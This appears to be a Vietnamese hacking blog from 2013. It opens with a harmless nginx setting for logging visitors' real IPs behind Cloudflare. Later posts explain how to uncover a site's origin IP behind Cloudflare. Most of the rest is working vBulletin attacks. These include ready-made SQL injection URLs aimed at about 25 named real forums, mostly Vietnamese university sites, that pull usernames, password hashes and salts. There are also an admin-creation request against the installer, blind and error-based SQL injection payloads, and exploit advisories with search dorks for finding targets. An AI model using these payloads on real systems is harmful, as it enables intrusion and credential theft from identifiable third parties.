Saturday 28 December 2013

Làm sao lấy IP thật connect tới server nếu bạn dùng cloudflare

Vấn đề đặt ra nếu server bạn đặt trước cloudflare.Thì ip connect đến server bạn sẽ là ip của cloudflare.Log ghi nhận cũng là ip cloudflare.Vậy để ghi log của người dùng thật bạn làm như sau.
Nếu dùng nginx edit file nginx.conf ở section http như sau
http {
set_real_ip_from   204.93.240.0/24;
set_real_ip_from   204.93.177.0/24;
set_real_ip_from   199.27.128.0/21;
set_real_ip_from   173.245.48.0/20;
set_real_ip_from   103.22.200.0/22;
set_real_ip_from   141.101.64.0/18;
set_real_ip_from   108.162.192.0/18;
real_ip_header     CF-Connecting-IP;

Nếu dùng Varnish trước nghinx thì sửa như vậy và add trên ip 127.0.0.1 vào danh sách như trên

http {
set_real_ip_from   204.93.240.0/24;
set_real_ip_from   204.93.177.0/24;
set_real_ip_from   199.27.128.0/21;
set_real_ip_from   173.245.48.0/20;
set_real_ip_from   103.22.200.0/22;
set_real_ip_from   141.101.64.0/18;
set_real_ip_from   108.162.192.0/18;
set_real_ip_from   127.0.0.1/32;
real_ip_header     CF-Connecting-IP;

Câu hỏi là mấy ip trên lấy ở đâu.Dễ lắm vào http://cloudflare.com/ips có gần đủ ip của cloudflare đó.Tất nhiên là ko đủ vì mình đã kiểm tra
Posted by at No comments:

Bypass cloudflare

Cách 1:Check lịch sử domain nó.Dùng site này :
http://toolbar.netcraft.com/site_report?url=DOMAIN.COM

 Cách 2:Brute dns dùng nmap

 # nmap -sV -sS -F <target>               //kiểm tra dịch vụ
# nmap --script dns-brute -sn <target>         //brute nào
http://www.youtube.com/watch?v=IsWFE2GaQnk

 Cách 3: Check online (ping submain và dịch vụ server ).

 http://network-tools.com
http://www.cloudflare-watch.com/cfs.html
http://iphostinfo.com/cloudflare/antiwhitehat.com
http://exonapps.nl/cfresolver/
http://www.vlvc.edu.vn/mail/cloud.php

Nó sẽ check online các service như:
mail.antiwhitehat.com
 ecorddirect.antiwhitehat.com 50.23.64.17
direct-connect.antiwhitehat.com No DNS
recordcpanel.antiwhitehat.com 50.23.64.17
ftp.antiwhitehat.com 50.23.64.17
admin.antiwhitehat.com No DNS
recordpop.antiwhitehat.com 50.23.64.17
imap.antiwhitehat.com No DNS
recordwebmail.antiwhitehat.com 50.23.64.17
forum.hantiwhitehat.com No DNS
recordadmin.antiwhitehat.com No DNS
recordbeta.antiwhitehat.com No DNS
recordportal.antiwhitehat.com No DNS record


Cach 4: Bypass dùng Fierce trên Backtrack

 Vào đường dẫn : /pentest/emumeration/dns/pierce/
chạy
./pierce.pl dns domain.com

Cách 5: Dùng 1 số tool ,mấy tool này mình ko biết có dính bọ ko nhé
 Vào đây xem và down http://www.youtube.com/watch?v=08fnIFf6GVQ
...Còn vài cách cập nhật sau.


Posted by at No comments:

Monday 21 October 2013

vBulletin ChangUonDyU



Lỗi cổ rồi viết lại cho ai chưa biết
http://www.mediafire.com/?rsbbczaf00abqtf

Có thể xem thêm victim sau
http://www.bacgiangonline.net/diendan/ajax.php?do=allforum&result=20

Forum teen Tỉnh Bắc Giang :http://www.bacgiangonline.net/diendan/ajax.php?do=inforum&listforumid=-20)+/*!50000unION*/+/*!50000seLECT*/+1,2,3,4,5,concat_ws(0x2f,userid,password,salt),7,8,9,10 from user where userid =1-- -&result=20









Diễn Đàn Cầu Đường- Đại Học Xây Dựng :http://www.cauduong.edu.vn/diendan/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20


Diễn đàn webgame :http://diendan.webgame.vn/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10%20%20from%20user%20where%20userid%20=1--%20-&result=20


Đại học mở thành phố Hồ Chí Minh:http://sinhvienou.net/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20







Khoa tài chính - Kế tóan -Đại học sài gòn :http://fafsgu.vn/diendan/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Khoa công trình thủy -Đại học hàng hải :http://ctt.edu.vn/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20



Khoa tài chính ngân hàng-đại học thương mại: http://www.tcnh-dhtm.org/diendan/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Đại học kỹ thuật công nghiệp :http://k43tdh2.com/forum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Đại học lao động xã hội: http://wwwulsa.edu.vn/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Đại học thành đô Hà Nội:http://svthanhdo.com/diendan/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,2,3,4,5,concat_ws%280x2f,userid,password,salt%29,7,8,9,10%20from%20user%20where%20userid%20=1--%20-&result=20

Diễn đàn Kinh Môn http://kinhmon24h.com/4rum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,2,3,4,5,concat_ws%280x2f,userid,password,salt%29,7,8,9,10%20from%20user%20where%20userid%20=1--%20-&result=20

Game gủng gì đó mới ra :http://forum.tinhvankiem.net/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,2,3,4,5,concat_ws%280x2f,userid,password,salt%29,7,8,9,10%20from%20user%20where%20userid%20=1--%20-&result=20



Cộng đồng cao học Kinh Tế VN:http://caohockinhte.vn/forum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10%20%20from%20user%20where%20userid%20=1--%20-&result=20





Diễn đàn kĩ sư Môi Trường VN:http://kysumoitruong.vn/diendan/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Diễn đàn sức khỏe :http://forum.suckhoeconnguoi.com/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20


Khoa Kỹ Thuật Công Nghiệp -Đại Học Thái Nguyên:http://khoaktcn.tntec.edu.vn/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Diễn Đàn cao đẳng nghê Quốc Tế Nam Việt:http://www.namviet.edu.vn/forum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Cao Đẳng sư phạm Hà Giang :http://cdsphagiang.edu.vn/forum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20


Forum Tỉnh Đồng Nai :http://forum.dongnai.org/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10%20%20from%20user%20where%20userid%20=1--%20-&result=20

Diễn Đàn Kĩ Sư Kết Cấu Việt Nam:http://www.ketcau.com/forum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10%20%20from%20user%20where%20userid%20=1--%20-&result=20%27


Diễn Đàn Tôn Giáo Đạo Mẫu :http://hatvan.vn/forum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10%20%20from%20user%20where%20userid%20=1--%20-&result=20

Forum Thể Thao:http://vietsport.vn/forum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Cao Đẳng Kỹ Thuật Thái Nguyên:http://fandore.com/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20


Tạp chí Hóa Học :http://www.hoahoc.org/forum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20


Đại Học Kĩ Thuật Công Nghệ http://dhktcn.edu.vn/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Khoa công nghệ thông tin-Viện mở Hà Nội http://forum.sinhvienfithou.com/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20
Posted by at No comments:

exploit vbb upgrade.php 0day

http://www.youtube.com/watch?v=LF05iUB6Cf0&list=SPF6T3E4DLjOT9PpTwkuTONYR-kHc-CeI6

URL :
http://localhost:8080/vbb4/install/install.php
http://localhost:8080/vbb4/install/upgrade.php
DATA :
ajax=1&version=install&checktable=false&firstrun=false&step=7&startat=0&only=false&customerid=&response=yes&htmlsubmit=1&htmldata[username]=yoyo&htmldata[password]=123456&htmldata[confirmpassword]=123456&htmldata[email]=admin@admin.com&
Posted by at No comments:

SQL VBB 5.0.0

) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

http://www.youtube.com/watch?v=CMWUtv3bwcQ&list=SPF6T3E4DLjOT9PpTwkuTONYR-kHc-CeI6
Posted by at No comments:

Tuesday 21 May 2013

SQL vbulletin 5.x và code perl

#Title: vBulletin 5 SQL Injection > Beta Whatever
#Author: 0x0A
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Software Link: http://www.vbulletin.com/purchases/
http://www.vbulletin.com/features/
#Version: 5 and above(not older versions)
#Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
#Dork: "Powered by vBulletin™ Version 5.0.0 Beta"
#Demo sites to try: http://www.sultantheme.com/vb5connectforum/
http://vb5connect.com/bb/

How to manually inject :
-------------------------------------------------------------------
[#1] First of all, make an account to the vBulletin 5 forum,
-------------------------------------------------------------------


--------------------------------------------------------------------

Read more »
Posted by at No comments:

Wednesday 15 May 2013

Vbulletin MOD all


c0d3_z3r0/vBulletin vbBux/vbPlaza Blind SQL Injection 


--==+======================================================================================================================+==--
--==+                  vBulletin vbBux/vbPlaza <= 2.x (vbplaza.php) Remote Blind SQL Injection Vulnerability                +==--
--==+======================================================================================================================+==--
AUTHOR: Cold z3ro &amp; Crck_Man
SITE: www.vbPlaza.com
DORK: inurl:"vbplaza.php?do=*"
DESCRIPTION: Blind SQL Injection in name of vbplaza.php a mod for vBulletin, able to retrieve admin hash
EXPLOIT:
http://www.site.com/forum/vbplaza.php?do=item&amp;name=bank'/**/and 58<ascii(substring((SELECT concat(password,0x3a,username) from user limit 0,1),33,1))/*
IE: ascii encodes
  58  => :
  48  => 0
  120 => x
NOTE: You'll need to be logged into the forum to exploit vbplaza.php. Increment the limit to get the next admin .
Copyrights : www.hackteach.org , www.h-t.cc
Greetz : www.hackteach.[org/net] , www.islam-attack.com , www.s3curi7y.com , www.xp10.biz , Friends


Read more »
Posted by at No comments:

exploit vbulletin 4.1.9

# Full Path Disclosure:

http://localhost/path/forumdisplay.php?do[]=linc0ln.dll
http://localhost/path/calendar.php?do[]=linc0ln.dll
http://localhost/path/search.php?do[]=linc0ln.dll
Posted by at No comments:

vbulletin 4.1.12

vBulletin 4.1.12 SQL Injection


################################################################################??########
#
# Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability
#
# Author        : IrIsT.Ir
#
# Discovered By : Am!r
#
# Home          : http://IrIsT.Ir/forum
#
# Software Link : http://www.Vbulletin.com/
#
# Security Risk : High
#
# Version       : All Version
#
# Tested on     : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork          : intext:"Powered By Vbulletin 4.1.12"
#
################################################################################??########
#
#  Expl0iTs :
#
http://target.com/includes/blog_plugin_useradmin.php?do=usercss&amp;u=[Sql]
#
################################################################################??########
#
# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r
#
# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r
#
# Mr.Xpr &amp; M.R.S.CO &amp; Mr.Cicili &amp; H-SK33PY &amp; All Members In Www.IrIsT.Ir/forum
#
################################################################################??########

Read more »
Posted by at 3 comments:
Subscribe to: Posts (Atom)